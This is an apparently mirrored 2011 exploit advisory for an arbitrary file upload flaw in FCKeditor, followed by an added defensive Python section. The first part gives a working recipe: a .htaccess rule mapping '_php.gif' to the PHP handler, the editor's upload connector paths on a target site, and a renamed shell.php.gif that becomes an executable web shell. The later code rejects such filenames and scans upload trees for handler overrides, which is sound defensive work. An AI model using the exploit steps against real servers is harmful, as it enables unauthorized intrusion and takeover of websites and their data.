FCKeditor All Versions File Upload Vulnerability Warning - The Black Bar Safety Net

2011-10-22T00:00:00
ID MYHACK58:62201132109
Type myhack58
Reporter Anonymous
Modified 2011-10-22T00:00:00

Description

In The Name Of GOD

[+] Title: FCKeditor All Versions Arbitrary File Upload Vulnerability

[+] Date: 2011

[+] Script: http://sourceforge.net/projects/fckeditor/

[+] Author: pentesters.ir

[+] Website: WwW.PenTesters.IR


  1. Create a .htaccess file:

code:

<FilesMatch "_php.gif">
SetHandler application/x-httpd-php
</FilesMatch>

  2. Now upload this .htaccess with FCKeditor:

http://target.com/FCKeditor/editor/filemanager/upload/test.html

http://target.com/FCKeditor/editor/filemanager/browser/default/connectors/test.html

  3. Now upload shell.php.gif with FCKeditor.

  4. After the upload, the name "shell.php.gif" is changed to "shell_php.gif" automatically.

  5. http://target.com/anything/shell_php.gif

  6. Now the shell is available from the server.
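The bypass above depends on two things: the editor accepting a dotfile upload, and its sanitizer turning `shell.php.gif` into `shell_php.gif`, a name the uploaded `.htaccess` then maps to the PHP handler (Apache only honours that `SetHandler` when `AllowOverride` grants `FileInfo` in the upload directory). As an added defensive example, not code from the advisory or from FCKeditor, the Python below rejects such names before they are stored and scans an upload tree for `.htaccess` files that override handlers; the extension lists, directive list and `upload_root` are assumptions to adapt to your stack.

```python
import os
import re

# Constructed lists (assumption: adapt to the handlers your Apache/PHP build enables).
EXECUTABLE_TOKENS = {"php", "php3", "php4", "php5", "phtml", "phar", "cgi", "pl"}
ALLOWED_EXTS = {"gif", "jpg", "jpeg", "png"}

# Directives that let a per-directory .htaccess change how a file is served or executed.
HANDLER_DIRECTIVE = re.compile(
    r"^\s*<?(SetHandler|AddHandler|AddType|FilesMatch|Files)\b", re.I | re.M
)


def is_safe_upload_name(name: str) -> bool:
    """Accept only a plain name with exactly one allowlisted extension.

    Rejects dotfiles (so .htaccess itself is never stored), double extensions
    such as shell.php.gif, and stems that still carry an executable token after
    a sanitizer rewrites '.' to '_' (shell_php.gif), since that token is exactly
    what a FilesMatch rule can target.
    """
    base = os.path.basename(name.replace("\\", "/"))
    if not base or base.startswith("."):
        return False
    parts = base.lower().split(".")
    if len(parts) != 2:
        return False
    stem, ext = parts
    if not stem or ext not in ALLOWED_EXTS:
        return False
    return not any(tok in EXECUTABLE_TOKENS for tok in re.split(r"[^a-z0-9]+", stem))


def has_handler_directive(htaccess_text: str) -> bool:
    """True if .htaccess content contains a handler or MIME-type override."""
    return HANDLER_DIRECTIVE.search(htaccess_text) is not None


def find_handler_overrides(upload_root: str) -> list:
    """Walk an upload tree and return the .htaccess files that override handlers.

    Useful as a periodic check: a legitimate upload directory should contain none.
    """
    hits = []
    for dirpath, _dirs, files in os.walk(upload_root):
        for fname in files:
            if fname.lower() == ".htaccess":
                path = os.path.join(dirpath, fname)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    if has_handler_directive(fh.read()):
                        hits.append(path)
    return hits
```

Pair the name check with `AllowOverride None` on the upload directory (or serving uploads from outside the web root), since the filename filter alone cannot undo an override that is already in place.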